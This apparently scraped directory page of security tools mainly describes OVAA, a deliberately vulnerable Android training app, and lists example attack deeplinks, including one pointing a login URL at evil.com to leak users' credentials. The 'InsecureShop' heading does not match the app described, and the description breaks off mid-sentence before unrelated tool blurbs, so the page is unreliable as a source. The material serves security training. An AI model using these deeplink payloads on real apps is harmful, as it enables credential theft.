InsecureShop
Android application for learning about vulnerabilities in modern Android apps and testing pentesting skills.
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities. List of vulnerabilities:
- Installation of an arbitrary login_url via deeplink oversecured://ovaa/login?url=http://evil.com/ leads to the user's user name and password being leaked when they log in.
- Obtaining access to arbitrary content providers (not exported, but with the attribute android:grantUriPermissions="true") via deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS and pass intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION and the URI of the content provider.
- Vulnerable host validation when processing deeplink oversecured://ovaa/webview?url=....
- Opening arbitrary URLs via deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(
House: A runtime mobile application analysis toolkit with a Web GUI, powered by Frida, written in Python.
PLCinject is a tool for injecting and patching blocks on PLCs with a call instruction.
A security checklist app for your Mac that helps you with basic security hygiene and prevents 80% of problems.
A data-mining and deep web asset search engine for breach analysis and prevention services.
A tool for quantitative risk analysis of Android applications using machine learning techniques.